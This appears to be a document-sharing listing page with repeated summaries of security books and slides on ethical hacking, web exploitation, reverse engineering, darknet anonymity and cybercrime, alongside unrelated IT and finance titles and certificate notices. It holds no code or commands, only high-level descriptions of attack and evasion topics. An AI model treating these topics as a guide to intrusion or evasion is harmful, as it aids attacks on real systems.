This document introduces ethical hacking and discusses various hacking techniques. It covers topics like footprinting, scanning, enumeration, cracking passwords, viruses/worms, sniffers, social engineering, denial of service attacks, session hijacking, hacking web servers, web application vulnerabilities, SQL injection, wireless hacking, physical security, Linux hacking, evading detection, buffer overflows, and cryptography. The document provides information on hacking laws and describes many hacking methods and tools in detail.
Implementing and auditing security controls part 1Rafel Ivgi
This book introduces the 20 most critical security controls that any organization must implement to defend against modern cyber attacks. It discusses insider and outsider threats, common security standards from the US government, and how to audit controls to ensure they are effective. The document provides details on technical controls for network equipment, laptops, web servers, and more to help organizations implement the 20 critical security controls and protect their data.
This document introduces concepts related to securing Java web applications, including:
- Authentication methods like JAAS and how it integrates with applications servers like JBoss.
- Authorization techniques including security roles and constraints.
- Configuring security features in JBoss like securing JMX consoles and remoting.
- Implementing authentication and authorization in applications using tools like jGuard.
Advanced web application hacking and exploitationRafel Ivgi
This document introduces advanced web hacking techniques and methods for securing websites against attacks. It covers reconnaissance methods like detecting website statistics, IP addresses, subdomains, and server details. It then discusses various attacks like XSS, session hijacking, SQL injection, and ways to bypass web application firewalls. Finally, it provides recommendations for secure website architecture with multi-tier systems and hardening guides for platforms like IIS, Apache, and Tomcat.
This document discusses log management, including why log data is important, how organizations use log data, common pain points with log analysis, and key aspects of implementing a log management system. Log data provides value for system health monitoring, forensics investigations, regulatory compliance, and marketing insights. The document covers log collection, analysis, reporting, and various commercial and open-source log management tools and solutions.
Configuring Microsoft Windows IP Security to Operate with HP ...webhostingguy
This document provides instructions for configuring Microsoft Windows IP Security (IPsec) to operate with HP-UX IPSec in both host-to-host and end-to-end tunnel topologies. It describes how to create Windows IPsec policies with rules for address filtering and security associations. It also compares IPsec configuration parameters between Windows and HP-UX and provides troubleshooting tips.
This document provides an overview and reference for the Yahoo! Web Analytics API. It describes the supported entities that can be accessed via the API, such as accounts, projects, campaigns, and reports. It also outlines the main operations that can be performed, including initializing a session with the login call, retrieving and updating account information, scheduling and accessing reports, and reconciliation features. The document provides details on the SOAP and XML-RPC implementations and includes examples of API calls and responses.
This document provides an introduction to the book "Performance Tuning with SQL Server Dynamic Management Views" which explores the use of Dynamic Management Views (DMVs) and Dynamic Management Functions (DMFs) in SQL Server for performance monitoring and troubleshooting. The book covers DMVs in six categories including execution related, transaction related, index related, database/I/O related, and SQL operating system related DMVs. It aims to describe important columns returned by DMVs and provide scripts for investigating areas such as user activity, query plans, indexing strategies, I/O usage, and OS/hardware resources.
This document provides a tutorial for building an ASP.NET MVC Music Store application. It begins by creating a new ASP.NET MVC 3 project and adding a HomeController to handle the home page. Next, a StoreController is added to manage store browsing functionality, including listing music genres, browsing albums in a genre, and viewing album details. The tutorial then covers data access using Entity Framework Code First, adding validation, membership, a shopping cart, registration and checkout functionality. It concludes by implementing additional site features like navigation, layout updates, and displaying top selling albums on the home page.
Implementing and auditing security controls part 1Rafel Ivgi
This book introduces the 20 most critical security controls that any organization must implement to defend against modern cyber attacks. It discusses insider and outsider threats, common security standards from the US government, and how to audit controls to ensure they are effective. The document provides details on technical controls for network equipment, laptops, web servers, and more to help organizations implement the 20 critical security controls and protect their data.
This document introduces concepts related to securing Java web applications, including:
- Authentication methods like JAAS and how it integrates with applications servers like JBoss.
- Authorization techniques including security roles and constraints.
- Configuring security features in JBoss like securing JMX consoles and remoting.
- Implementing authentication and authorization in applications using tools like jGuard.
Advanced web application hacking and exploitationRafel Ivgi
This document introduces advanced web hacking techniques and methods for securing websites against attacks. It covers reconnaissance methods like detecting website statistics, IP addresses, subdomains, and server details. It then discusses various attacks like XSS, session hijacking, SQL injection, and ways to bypass web application firewalls. Finally, it provides recommendations for secure website architecture with multi-tier systems and hardening guides for platforms like IIS, Apache, and Tomcat.
This document discusses log management, including why log data is important, how organizations use log data, common pain points with log analysis, and key aspects of implementing a log management system. Log data provides value for system health monitoring, forensics investigations, regulatory compliance, and marketing insights. The document covers log collection, analysis, reporting, and various commercial and open-source log management tools and solutions.
Configuring Microsoft Windows IP Security to Operate with HP ...webhostingguy
This document provides instructions for configuring Microsoft Windows IP Security (IPsec) to operate with HP-UX IPSec in both host-to-host and end-to-end tunnel topologies. It describes how to create Windows IPsec policies with rules for address filtering and security associations. It also compares IPsec configuration parameters between Windows and HP-UX and provides troubleshooting tips.
This document provides an overview and reference for the Yahoo! Web Analytics API. It describes the supported entities that can be accessed via the API, such as accounts, projects, campaigns, and reports. It also outlines the main operations that can be performed, including initializing a session with the login call, retrieving and updating account information, scheduling and accessing reports, and reconciliation features. The document provides details on the SOAP and XML-RPC implementations and includes examples of API calls and responses.
This document provides an introduction to the book "Performance Tuning with SQL Server Dynamic Management Views" which explores the use of Dynamic Management Views (DMVs) and Dynamic Management Functions (DMFs) in SQL Server for performance monitoring and troubleshooting. The book covers DMVs in six categories including execution related, transaction related, index related, database/I/O related, and SQL operating system related DMVs. It aims to describe important columns returned by DMVs and provide scripts for investigating areas such as user activity, query plans, indexing strategies, I/O usage, and OS/hardware resources.
This document provides a tutorial for building an ASP.NET MVC Music Store application. It begins by creating a new ASP.NET MVC 3 project and adding a HomeController to handle the home page. Next, a StoreController is added to manage store browsing functionality, including listing music genres, browsing albums in a genre, and viewing album details. The tutorial then covers data access using Entity Framework Code First, adding validation, membership, a shopping cart, registration and checkout functionality. It concludes by implementing additional site features like navigation, layout updates, and displaying top selling albums on the home page.
This document provides an overview and tutorial for building an ASP.NET MVC Music Store application. It begins by creating a new ASP.NET MVC 3 project and adding prerequisite software. Controllers and views are then added to implement basic pages for the home, store index, and individual albums. The tutorial progresses to adding data access with Entity Framework Code First, validation, authorization, a shopping cart, registration/checkout, and final styling. Each section builds upon the previous to create a full-featured e-commerce music store application using ASP.NET MVC patterns and practices.
This document discusses service oriented architecture (SOA) and its application in real world systems. It begins with an introduction to SOA concepts like services, reuse, and loose coupling. It then discusses common architectural capabilities like messaging, workflow, data management and user experience that are important in SOA. The document provides an abstract reference model for SOA and shows how the common capabilities relate to the model's phases of expose, compose and consume. Later chapters discuss specific capabilities like messaging and workflow in more depth and provide examples.
This document provides information about the book "QuickTest Professional Unplugged - Second Edition" including preface material. The preface outlines that the book is intended for software testers who want to learn QTP and discusses what is new in the second edition. It also provides information on how to provide feedback or order the book. The document contains legal disclaimers about copyright and liability.
This document provides a tutorial on using the MySQL database system. It covers connecting to a MySQL server, entering queries, creating and selecting a database, creating and populating tables, and retrieving data from tables. Various SQL queries are demonstrated, including selecting, sorting, pattern matching, counting rows, and joining tables.
This document provides an overview of ethical hacking concepts and techniques, including footprinting, scanning, enumeration, and common tools used. It discusses the goals and processes of attackers, as well as important legal and ethical considerations. Footprinting involves passively gathering open-source information on a target organization like domain names, IP addresses, and technology used. Scanning uses tools like ping sweeps, port scanning with Nmap, and banner grabbing to identify active devices and services on a network. Enumeration discovers additional details about the target through techniques such as NetBIOS sessions, Active Directory information gathering, and SNMP scans. The document stresses the importance of only using these techniques with authorization and for legitimate security evaluation purposes.
Doctrine ORM for PHP is an object-relational mapper (ORM) for PHP applications. It provides transparent persistence for PHP objects and works with many databases including MySQL, PostgreSQL, and SQLite. The guide covers installing and configuring Doctrine, defining models and relationships, querying data with DQL, and additional features like validation, inheritance, behaviors and searching.
Cybersecurity is a constant, and, by all accounts growing, challenge. Although software products are gradually becoming more secure and novel approaches to cybersecurity are being developed, hackers are becoming more adept, their tools are better, and their markets are flourishing. The rising tide of network intrusions has focused organizations' attention on how to protect themselves better. This report, the second in a multiphase study on the future of cybersecurity, reveals perspectives and perceptions from chief information security officers; examines the development of network defense measures — and the countermeasures that attackers create to subvert those measures; and explores the role of software vulnerabilities and inherent weaknesses. A heuristic model was developed to demonstrate the various cybersecurity levers that organizations can control, as well as exogenous factors that organizations cannot control. Among the report's findings were that cybersecurity experts are at least as focused on preserving their organizations' reputations as protecting actual property. Researchers also found that organizational size and software quality play significant roles in the strategies that defenders may adopt. Finally, those who secure networks will have to pay increasing attention to the role that smart devices might otherwise play in allowing hackers in. Organizations could benefit from better understanding their risk posture from various actors (threats), protection needs (vulnerabilities), and assets (impact). Policy recommendations include better defining the role of government, and exploring information sharing responsibilities.
This document provides an overview and guide for using HSPcomplete, a hosting automation solution that allows hosting service providers to manage infrastructure, billing, sales channels, and e-commerce through a single system. It describes HSPcomplete's advantages like integrated billing and credit card processing, virtual private server management, and domain registration. Hardware, software, and user requirements for HSPcomplete deployment are also outlined.
The document is a report from Arbor Networks that analyzes data from a survey of over 500 network operators regarding infrastructure security threats in 2011. Some key findings include:
- Distributed denial-of-service (DDoS) attacks were considered the most significant operational threat. Application-layer DDoS attacks using HTTP floods were most common.
- The largest reported DDoS attacks exceeded 100 Gbps in bandwidth. Major online gaming and gambling sites were frequently targeted.
- Most respondents experienced multiple DDoS attacks per month and detected increased awareness of the DDoS threat over the previous year.
- Network traffic detection, classification, and event correlation tools were commonly used to identify attacks and trace sources. DDo
This document provides a baseline risk assessment of the information technology sector. It identifies 6 critical functions: producing and providing IT products and services, domain name resolution services, identity management and trust services, internet-based content and communication services, internet routing and connection services, and incident management capabilities. For each function, the document describes attack trees, assesses threats, vulnerabilities and consequences to determine relative risks, and identifies mitigation strategies. It also discusses interdependencies between critical functions and the sector's dependencies. The goal is to enhance cybersecurity through public-private collaboration.
Comparing Game Development on the Android and Windows Phone 7 Platforms.Ruairí O'Brien
A document I did in College for my final year project detailing my experience developing the same game for both the Android and Windows Phone 7 mobile platforms.
A Real Time Application Integration SolutionMatthew Pulis
My final project for my BSc. Business Computing degree. The work involved designing a system for a helicopter company operating in the Maltese islands. The design was performed using UML. Prototypes were also drafted to enhance the solution.
This document provides an overview of tools and techniques for iOS reverse engineering. It discusses prerequisites for iOS reverse engineering like jailbreaking. It also describes the process of iOS reverse engineering including system analysis and code analysis. The document outlines various tools for iOS reverse engineering on OSX and the jailbroken iOS device itself including class-dump, Theos, IDA, Cycript and LLDB. It provides examples of using these tools and reversing iOS apps and system libraries.
The document provides an introduction to artificial intelligence, including:
- A brief history of AI from the 1980s "AI winter" period of failed projects through to recent advances enabled by improved hardware and new research areas like machine learning.
- Knowledge representation and reasoning, rule engines, hybrid reasoning systems, and expert systems are introduced as key concepts in AI.
- The advantages of using a rule engine are discussed, as well as when rule engines are appropriate versus other approaches like scripting engines. The Rete algorithm, which is commonly used in rule engines, is also introduced.
The document provides instructions for accessing and using a contact management database (CMD) system. It includes information on:
1) Logging into the system remotely by establishing a VPN connection and accessing the application URL.
2) Navigating the system using tab menus to access modules like prospects, to-do lists, reports, and manuals.
3) Performing searches and advanced searches on prospects and other data, adding and editing contact information, notes, addresses, and more.
4) Instructions include screenshots and tips for optimizing the interface.
Sybase Adaptive Server Anywhere for Linuxmarcorinco
This document provides instructions for installing and using Sybase Adaptive Server Anywhere for Linux. It begins with an introduction that describes Adaptive Server Anywhere's features and requirements. It then covers installing SQL Anywhere Studio, creating and connecting to databases, backing up and restoring data, and basic database administration tasks. The document aims to guide moderately experienced Linux users through getting started with Adaptive Server Anywhere.
This document provides an introduction to derivatives, including futures and options. It discusses key concepts such as the definition of derivatives and their economic functions. It also describes different types of derivatives products and participants in the derivatives markets. The document focuses on the Indian derivatives market and covers important indexes like the S&P CNX Nifty. It explains the pricing and applications of futures and options, including how they can be used for hedging, speculation, and arbitrage.
This document provides instructions for handling, installing, wiring, operating and maintaining an inverter. It discusses the inverter structure, removing covers, installing optional units, transportation, installation location, clearances, wiring diagrams, pre-operation checks, parameter settings, test runs, parameter unit functions and operation, maintenance, troubleshooting, optional accessories and specifications. Key points include proper handling to prevent damage, ambient temperature requirements, main and control circuit wiring, pre-operation checks and settings, monitoring and adjusting parameters, and protective functions.
A software bug is an error in a computer program that produces unexpected or incorrect results. Security bugs compromise authentication, authorization, data confidentiality, or integrity. Hackers find security bugs through reverse engineering code or fuzzing software to discover vulnerabilities. An exploit is a piece of code that activates a bug to run malicious code. Shellcode is typically used as the payload in an exploit to gain control of a compromised system. Cyber attacks can target individuals, networks, or remote systems. Advanced persistent threats (APTs) are sophisticated, well-funded hacking groups that persistently target specific entities over long periods using social engineering and zero-day exploits. APT attacks involve penetrating targets, spreading to other systems, aggregating data, and covert
This document provides an overview and tutorial for building an ASP.NET MVC Music Store application. It begins by creating a new ASP.NET MVC 3 project and adding prerequisite software. Controllers and views are then added to implement basic pages for the home, store index, and individual albums. The tutorial progresses to adding data access with Entity Framework Code First, validation, authorization, a shopping cart, registration/checkout, and final styling. Each section builds upon the previous to create a full-featured e-commerce music store application using ASP.NET MVC patterns and practices.
This document discusses service oriented architecture (SOA) and its application in real world systems. It begins with an introduction to SOA concepts like services, reuse, and loose coupling. It then discusses common architectural capabilities like messaging, workflow, data management and user experience that are important in SOA. The document provides an abstract reference model for SOA and shows how the common capabilities relate to the model's phases of expose, compose and consume. Later chapters discuss specific capabilities like messaging and workflow in more depth and provide examples.
This document provides information about the book "QuickTest Professional Unplugged - Second Edition" including preface material. The preface outlines that the book is intended for software testers who want to learn QTP and discusses what is new in the second edition. It also provides information on how to provide feedback or order the book. The document contains legal disclaimers about copyright and liability.
This document provides a tutorial on using the MySQL database system. It covers connecting to a MySQL server, entering queries, creating and selecting a database, creating and populating tables, and retrieving data from tables. Various SQL queries are demonstrated, including selecting, sorting, pattern matching, counting rows, and joining tables.
This document provides an overview of ethical hacking concepts and techniques, including footprinting, scanning, enumeration, and common tools used. It discusses the goals and processes of attackers, as well as important legal and ethical considerations. Footprinting involves passively gathering open-source information on a target organization like domain names, IP addresses, and technology used. Scanning uses tools like ping sweeps, port scanning with Nmap, and banner grabbing to identify active devices and services on a network. Enumeration discovers additional details about the target through techniques such as NetBIOS sessions, Active Directory information gathering, and SNMP scans. The document stresses the importance of only using these techniques with authorization and for legitimate security evaluation purposes.
Doctrine ORM for PHP is an object-relational mapper (ORM) for PHP applications. It provides transparent persistence for PHP objects and works with many databases including MySQL, PostgreSQL, and SQLite. The guide covers installing and configuring Doctrine, defining models and relationships, querying data with DQL, and additional features like validation, inheritance, behaviors and searching.
Cybersecurity is a constant, and, by all accounts growing, challenge. Although software products are gradually becoming more secure and novel approaches to cybersecurity are being developed, hackers are becoming more adept, their tools are better, and their markets are flourishing. The rising tide of network intrusions has focused organizations' attention on how to protect themselves better. This report, the second in a multiphase study on the future of cybersecurity, reveals perspectives and perceptions from chief information security officers; examines the development of network defense measures — and the countermeasures that attackers create to subvert those measures; and explores the role of software vulnerabilities and inherent weaknesses. A heuristic model was developed to demonstrate the various cybersecurity levers that organizations can control, as well as exogenous factors that organizations cannot control. Among the report's findings were that cybersecurity experts are at least as focused on preserving their organizations' reputations as protecting actual property. Researchers also found that organizational size and software quality play significant roles in the strategies that defenders may adopt. Finally, those who secure networks will have to pay increasing attention to the role that smart devices might otherwise play in allowing hackers in. Organizations could benefit from better understanding their risk posture from various actors (threats), protection needs (vulnerabilities), and assets (impact). Policy recommendations include better defining the role of government, and exploring information sharing responsibilities.
This document provides an overview and guide for using HSPcomplete, a hosting automation solution that allows hosting service providers to manage infrastructure, billing, sales channels, and e-commerce through a single system. It describes HSPcomplete's advantages like integrated billing and credit card processing, virtual private server management, and domain registration. Hardware, software, and user requirements for HSPcomplete deployment are also outlined.
The document is a report from Arbor Networks that analyzes data from a survey of over 500 network operators regarding infrastructure security threats in 2011. Some key findings include:
- Distributed denial-of-service (DDoS) attacks were considered the most significant operational threat. Application-layer DDoS attacks using HTTP floods were most common.
- The largest reported DDoS attacks exceeded 100 Gbps in bandwidth. Major online gaming and gambling sites were frequently targeted.
- Most respondents experienced multiple DDoS attacks per month and detected increased awareness of the DDoS threat over the previous year.
- Network traffic detection, classification, and event correlation tools were commonly used to identify attacks and trace sources. DDo
This document provides a baseline risk assessment of the information technology sector. It identifies 6 critical functions: producing and providing IT products and services, domain name resolution services, identity management and trust services, internet-based content and communication services, internet routing and connection services, and incident management capabilities. For each function, the document describes attack trees, assesses threats, vulnerabilities and consequences to determine relative risks, and identifies mitigation strategies. It also discusses interdependencies between critical functions and the sector's dependencies. The goal is to enhance cybersecurity through public-private collaboration.
Comparing Game Development on the Android and Windows Phone 7 Platforms.Ruairí O'Brien
A document I did in College for my final year project detailing my experience developing the same game for both the Android and Windows Phone 7 mobile platforms.
A Real Time Application Integration SolutionMatthew Pulis
My final project for my BSc. Business Computing degree. The work involved designing a system for a helicopter company operating in the Maltese islands. The design was performed using UML. Prototypes were also drafted to enhance the solution.
This document provides an overview of tools and techniques for iOS reverse engineering. It discusses prerequisites for iOS reverse engineering like jailbreaking. It also describes the process of iOS reverse engineering including system analysis and code analysis. The document outlines various tools for iOS reverse engineering on OSX and the jailbroken iOS device itself including class-dump, Theos, IDA, Cycript and LLDB. It provides examples of using these tools and reversing iOS apps and system libraries.
The document provides an introduction to artificial intelligence, including:
- A brief history of AI from the 1980s "AI winter" period of failed projects through to recent advances enabled by improved hardware and new research areas like machine learning.
- Knowledge representation and reasoning, rule engines, hybrid reasoning systems, and expert systems are introduced as key concepts in AI.
- The advantages of using a rule engine are discussed, as well as when rule engines are appropriate versus other approaches like scripting engines. The Rete algorithm, which is commonly used in rule engines, is also introduced.
The document provides instructions for accessing and using a contact management database (CMD) system. It includes information on:
1) Logging into the system remotely by establishing a VPN connection and accessing the application URL.
2) Navigating the system using tab menus to access modules like prospects, to-do lists, reports, and manuals.
3) Performing searches and advanced searches on prospects and other data, adding and editing contact information, notes, addresses, and more.
4) Instructions include screenshots and tips for optimizing the interface.
Sybase Adaptive Server Anywhere for Linuxmarcorinco
This document provides instructions for installing and using Sybase Adaptive Server Anywhere for Linux. It begins with an introduction that describes Adaptive Server Anywhere's features and requirements. It then covers installing SQL Anywhere Studio, creating and connecting to databases, backing up and restoring data, and basic database administration tasks. The document aims to guide moderately experienced Linux users through getting started with Adaptive Server Anywhere.
This document provides an introduction to derivatives, including futures and options. It discusses key concepts such as the definition of derivatives and their economic functions. It also describes different types of derivatives products and participants in the derivatives markets. The document focuses on the Indian derivatives market and covers important indexes like the S&P CNX Nifty. It explains the pricing and applications of futures and options, including how they can be used for hedging, speculation, and arbitrage.
This document provides instructions for handling, installing, wiring, operating and maintaining an inverter. It discusses the inverter structure, removing covers, installing optional units, transportation, installation location, clearances, wiring diagrams, pre-operation checks, parameter settings, test runs, parameter unit functions and operation, maintenance, troubleshooting, optional accessories and specifications. Key points include proper handling to prevent damage, ambient temperature requirements, main and control circuit wiring, pre-operation checks and settings, monitoring and adjusting parameters, and protective functions.
A software bug is an error in a computer program that produces unexpected or incorrect results. Security bugs compromise authentication, authorization, data confidentiality, or integrity. Hackers find security bugs through reverse engineering code or fuzzing software to discover vulnerabilities. An exploit is a piece of code that activates a bug to run malicious code. Shellcode is typically used as the payload in an exploit to gain control of a compromised system. Cyber attacks can target individuals, networks, or remote systems. Advanced persistent threats (APTs) are sophisticated, well-funded hacking groups that persistently target specific entities over long periods using social engineering and zero-day exploits. APT attacks involve penetrating targets, spreading to other systems, aggregating data, and covert
This document discusses various topics related to anonymity on darknets including:
- Ways enterprises bypass data leakage prevention including encryption and VPNs
- Differences between proxies, Tor, and VPNs and why Tor provides more anonymity
- Options for maximum anonymity hosting and WikiLeaks platforms on darknets
- Using open Wi-Fis or custom configurations as darknet exit nodes
- Digital currencies and tools like OpenTransactions that allow untraceable transactions
- Decentralized portal systems like Osiris and peer-to-peer networks for private file sharing and chat
- The relationship between encryption, anonymity, and enabling free speech
This document outlines the agenda and topics covered in a presentation on cyber crime. The presentation discusses the definition of cyber crime, the major players involved, common money laundering and anonymous purchasing techniques, and gives a live demonstration of how to anonymously conduct illegal activities online. Key points covered include the international nature of cyber crimes, challenges with legal accountability across borders, common cyber crime products and services, and the use of technologies like TOR and cryptocurrencies to conduct activities anonymously.
This document provides an overview and introduction to using Shodan, an internet search engine that allows users to search for publicly available devices and services. It describes what types of data Shodan collects, including banners which provide information about the service or device, and metadata like the device's location and operating system. It also discusses how the data is collected through Shodan's crawlers that scan the internet regularly, and that the data collected includes information on devices accessible via both IPv4 and IPv6 networks. The document serves as an introduction to using Shodan and exploring the different data and interfaces it provides.
This document is the introduction chapter of "The Hitchhiker's Guide to DFIR: Experiences From Beginners and Experts", a crowdsourced book by members of the Digital Forensics Discord Server. The book is available for purchase online and covers topics in digital forensics and incident response through shared experiences of practitioners at various levels of experience. This introduction chapter outlines the purpose of the book in providing guidance for both beginners and experts in DFIR, and encourages participation from the community to expand the book.
The document provides an overview of getting started with GNU/Linux. It covers useful terminal shortcuts, file management commands like navigating directories, listing files, and copying/removing files. It also discusses detecting the Linux distribution, getting system information, and using common commands like ls, tar, ssh and more. The document is intended as a reference for Linux professionals.
The document provides an overview of the Linux operating system and includes chapters on getting started with Linux, detecting the Linux distribution, getting kernel information, shell usage, checking disk space, system information, file compression and manipulation commands, service management, user management, installing LAMP stacks, network configuration utilities, secure shell (SSH), secure copy (SCP), GnuPG encryption, and more. It contains tutorials, examples, and explanations of common Linux commands and tasks.
Easttom C. Computer Security Fundamentals 3ed 2016.pdfJarellScott
This document is a table of contents for the book "Computer Security Fundamentals Third Edition" by Chuck Easttom. It provides an overview of the chapters included in the book, which cover topics such as introduction to computer security, networks and the internet, cyber stalking and fraud, denial of service attacks, malware, techniques used by hackers, encryption, computer security software, security policies, and network forensics. The table of contents lists the chapter titles, main section headings within the chapters, and page numbers to locate specific content within the book.
This document provides an overview of the Linux operating system and fundamentals for learning Linux, including:
- Details on Linux distributions like Debian, Red Hat, and SUSE and their licensing models.
- A brief history of open source software development and benefits of the open source model.
- Essentials of the Linux operating system like filesystem structure, shell commands, file permissions and redirection.
- Information on Linux certification programs.
- Setup instructions for a Linux emulator for the fundamentals course.
- Appendices on Linux Professional Institute certification levels and the Linux kernel.
This document outlines the machine requirements, prerequisites, and expected outcomes for courses on Linux fundamentals, system administration, networking, shell scripting, and internals.
For the fundamentals course, a Pentium 2 500MHz computer with 32MB RAM is recommended. The system administration course requires completion of fundamentals first. After completing fundamentals and system administration, the equivalent of a junior administrator would be achieved. Additional courses build on this knowledge towards senior roles.
This document provides an overview of the Linux operating system and fundamentals for learning Linux, including:
- Details on Linux distributions like Debian, Red Hat, and SUSE and their licensing models.
- A brief history of open source software development and benefits of the open source model.
- How to log into a Linux system, basics of the shell, command line navigation, and file management.
- Key topics covered include files/directories, permissions, and redirection.
- Information on Linux certification programs.
- Setup instructions for a Linux emulator for the fundamentals course.
Guide on the use of Artificial Intelligence-based tools by lawyers and law fi...Massimo Talia
This guide aims to provide information on how lawyers will be able to use the opportunities provided by AI tools and how such tools could help the business processes of small firms. Its objective is to provide lawyers with some background to understand what they can and cannot realistically expect from these products. This guide aims to give a reference point for small law practices in the EU
against which they can evaluate those classes of AI applications that are probably the most relevant for them.
This document is a book about expert Oracle database architecture for versions 9i and 10g. It discusses programming techniques and solutions. The book covers topics such as developing successful Oracle applications, database architecture overview, database files, memory structures, SQL and PL/SQL, concurrency and locking, performance, backup and recovery, and more. It aims to help readers understand Oracle architecture and how to write efficient and optimized database applications.
National Security Implications of virtual currency examining the potential fo...Dmitry Tseitlin
The document examines the potential for non-state actors to deploy virtual currencies to increase their political or economic power. It discusses how virtual currencies have evolved from early digital currencies and explores Bitcoin and other altcoins. It considers why a non-state actor may want to deploy a virtual currency and the technical challenges involved, such as developing software, gaining adoption, ensuring anonymity, and protecting against cyber threats. The document also discusses how technologies behind virtual currencies could enable resilient decentralized services beyond just currency.
DotNet & Sql Server Interview QuestionsNeeraj Kaushik
This document contains a table of contents listing 50 important topics for .NET interviews. The topics covered include what CLR does, common type system, common language specification, boxing and unboxing, variables, jump statements, nullable types, strings, indexers, iterators, secure strings, enumerated types, interfaces, app domains, threading, data assignment differences between value and reference types, cloning, assemblies, events vs delegates, object size, disposal patterns, data readers vs datasets, temporary tables, impersonation, and client-side form validation. The document provides a high-level overview of concepts that may be discussed during .NET interviews.
This chapter discusses setting up your development environment for SAS Infrastructure for Risk Management. It describes installing the Python scripting client, which allows you to create and run parallel programs on the platform. Example code is provided to interact with a sample federated area where data and tasks can be stored.
The document provides guidance on establishing an effective information security program. It outlines a security process with five key areas: risk assessment, security strategy, control implementation, monitoring, and continuous updating. It emphasizes the importance of governance, with clear roles and responsibilities for the board, senior management, and other parties. The board is responsible for overseeing the program, while management is accountable for implementation and ongoing risk management.
Take a close look at the complete guide on how to set up and use the SafeDNS service. In it you will find answers to the most common questions that arise when using SafeDNS.
With the help of this guide you can easily configure internet filtering on any device, learn how to efficiently use additional features, a filtering schedule and separate filtering policies, as well as find answers to key questions about buying a license and extending the SafeDNS service.
Sonic os standard_3_9_administrators_guideAshwani Singh
This document is an administrator's guide for SonicOS Standard 3.9 that provides comprehensive internet security. It contains information about setting up and configuring SonicWALL security appliances, including collecting ISP information, running the setup wizard, registering the appliance, and viewing system status and settings. The guide is organized into sections covering introduction and setup, system configuration and management, and technical reference for features.
This document provides an overview of the Microsoft Windows XP Registry and how it can be used and managed. It discusses the structure and organization of the registry, tools for editing and managing the registry like Registry Editor, backing up the registry, customizing Windows XP settings by modifying the registry, deploying registry-based group policies, managing registry security, finding registry settings, scripting registry changes, deploying user profiles, using Windows Installer and answer files to deploy applications, cloning disks using Sysprep, deploying Microsoft Office user settings, and working around common IT problems. The document is divided into multiple parts covering registry overview, management, deployment, and appendices. It provides technical details and step-by-step instructions for advanced registry
This document is the PSpice User Guide for product version 17.2-2016 published in April 2016. It provides an overview of PSpice, describes how to use PSpice with other Cadence tools, explains the files needed for simulation, discusses library management, and provides examples for creating simulation models and running analyses.
This document evaluates the Strategic Decision Support Centers (SDSCs) implemented by the Chicago Police Department.
The SDSCs are real-time crime centers located in each police district that bring together staff, technologies, and data to support policing operations and strategic decision-making. The evaluation assessed SDSC operations, technologies, and the impact on crime rates.
The evaluation found that the SDSCs functioned as intended by facilitating communication and information sharing. Technologies like ShotSpotter, police cameras, and mapping tools supported response to crimes and monitoring of areas. Statistical analyses estimated that SDSCs were associated with moderate reductions in total crime rates of 5-10% in their respective districts.
Similar to Hacker techniques, exploit and incident handling (20)
The document discusses configuring JBoss to work behind a firewall by modifying socket-based services that open listening ports. It lists several key JBoss services that open ports by default, including the naming service on port 1098, invoker services on ports 4444 and 4445, and others. It provides the configuration files and attributes to modify ports for each service.
The document analyzes vulnerabilities found in web applications through various scanning methods. It finds that over 48% of scanned web applications were not compliant with PCI DSS requirements when assessed through ASV scanning. However, a deeper analysis showed that nearly 99% of web applications were actually not compliant with the PCI DSS security standards. Administration flaws accounted for about 20% more vulnerabilities than code-based issues, and whitebox testing was necessary to detect many vulnerabilities that other methods missed.
Implementing and auditing security controls part 2Rafel Ivgi
This document describes the main functionalities and benefits of a network inventory management system. The key functionalities include real-time tracking of unmanaged devices, detailed hardware and software inventory information, history tracking of changes to inventory objects, auto-discovery and reconciliation to keep inventory up-to-date, network planning capabilities, and inventory-based billing. Benefits include an end-to-end view of networks, reduced operating costs, improved resource utilization, efficient change management, and seamless integration.
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...Rafel Ivgi
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on a world-wide epidemic
500,000 Vulnerable Devices
More than 500k of vulnerable devices found globally.
The malware exploited 62 default router & camera passwords, as well as TR-064 and TR-069 OS Command-Injection vulnerabilities.
120,000 Successful Infections (per day)
72,000 unique IPs infected in 12 hours, ~4000 new IPs per hour.
The worm is still running and new variants of it are released daily into the wild taking over more devices. Most of the devices are home /office routers, and CCTV cameras.
1.5 Tbps - Mirai: DDoS Record-Holder
Until Mirai, the world-record DDoS attacks reached 600 Gbps.
In 2014, the the average size of a DDoS attack was 7.39 Gbps.
2015 saw an increase to 500 Gbps.
In October 2016, Mirai ascended to the next level.
Mirai vs. Other IoT Botnets
Mirai - 500k infections, 1.5 Tbps DDoS
GayFgt/LizKebab/Torlus/Kaiten/Tsunami/PNScan/Qbot - 120k infections, 655 Gbps DDoS
Linux/IRCTelnet (new Aidra) - 3.5k infections, 100.5 Gbps DDoS
LizardStresser - 118k infections, 400 Gbps DDoS
Aidra (Carna/Darlloz) - 420k infections, 1.26 Tbps DDoS
Home & office routers, CCTV cameras, smart watches, and the IoT devices of the new era are becoming the main targets for remote takeover. DDoS and Crypto-Currency mining are main reasons, but the future holds more "attractions", more risks, and more target devices.
Firmitas solutions can be used to actively protect IoT devices, and prevent any unexpected/unintended behavior.
SCADA Cyber-Risk: Fact or Fiction?
Vulnerabilities vs. Incidents
Firmitas Presenting a New Approach
Attacks on Industrial Control Systems are growing threat on critical-infrastructure. No current technology can keep up with the upward trend of reported vulnerabilities, and incidents based on such vulnerabilities. This trend forces a new approach for securing mission-critical systems ...
Device-Side Protection
The targets of the attacks are the devices themselves.
Thus the devices must be protected rather than the computer sending the commands.
Prevention
Firmitas focuses on
protection by prevention
evolving from the well-known limitations of existing detection and situational-awareness technologies.
Deterministic
Firmitas deterministic solution is based on the pre-defined communication model of the specific target system. Free from the limitations of updates, signatures, or heuristics.
The United States Government acknowledging my professional skills in technology and the information security field as equivalent more than a B.Sc and approving me an O1 Visa.
This document is a CompTIA certification for Rafel Ivgi that is valid through March 07, 2014. It provides a certification code of EMCNTXYDED1EKYJY that can be verified online at http://verify.CompTIA.org.
Rafel Ivgi received an email from ISACA congratulating him for passing the CISM exam in June 2011 and encouraging him to apply for certification. The email details the benefits of obtaining the CISM certification and outlines the simple 3-step application process. It notes that while Rafel has 5 years to apply after passing the exam, his window to apply without paying an application fee will close on June 1, 2012. ISACA looks forward to Rafel joining the over 16,000 professionals who have earned the CISM designation.
